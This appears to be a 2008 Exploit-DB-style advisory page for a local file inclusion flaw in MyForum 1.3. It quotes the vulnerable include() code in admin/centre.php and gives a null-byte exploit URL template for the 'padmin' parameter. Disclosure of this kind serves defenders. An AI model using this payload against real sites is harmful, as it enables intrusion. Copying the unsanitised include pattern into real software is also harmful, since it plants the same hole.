Local File Inclusion Vulnerability

vendor:

MyForum

by:

Vrs-hCk

9.3

CVSS

HIGH

Local File Inclusion

CWE

Product Name: MyForum

Affected Version From: MyForum 1.3

Affected Version To: MyForum 1.3

Patch Exists: NO

Related CWE: N/A

CPE: a:easy-script:myforum:1.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Local File Inclusion Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The attacker can specify a malicious file in the ‘padmin’ parameter of the vulnerable application, which will be included in the application’s response. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in any file operations.

Source

Exploit-DB raw data:

[o]------------------------------------------------------------------------------------[x]
 |  Local File Inclusion Vulnerability                                                  |
[o]------------------------------------------------------------------------------------[o]
 |  Software : MyForum 1.3                                                              |
 |  Download : http://www.easy-script.com/scripts-dl/myforumv1.3.zip                    |                                                    |
 |  Date     : 27 October 2008                                                          |
 |  Author   : Vrs-hCk                                                                  |
 |  Contact  : d00r[at]telkom[dot]net                                                   |
[o]------------------------------------------------------------------------------------[o]

[Â»] Vulnerable

    ./admin/centre.php

    3:  if (isset($padmin))
    4:  {
    5:
    6:  $fichier = "padmin/".$padmin.".php";
    7: 
    8:  if (file_exists($fichier))
    9:  {
    10: include ($fichier); 
    11: }

[Â»] Exploit

    http://[site]/[path]/admin/centre.php?padmin=[LFI]%00

[o]------------------------------------------------------------------------------------[x]
 |  Greetz                                                                              |
[o]------------------------------------------------------------------------------------[o]
 |  All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org        |
 |  Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem,   |
 |  loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang,        |
 |  chawanua, bl4Ck_3n91n3, R3V4N_B4ST4RD, dkk ... c0li.m0de.0n !!!                     |
[o]------------------------------------------------------------------------------------[o]

# milw0rm.com [2008-10-27]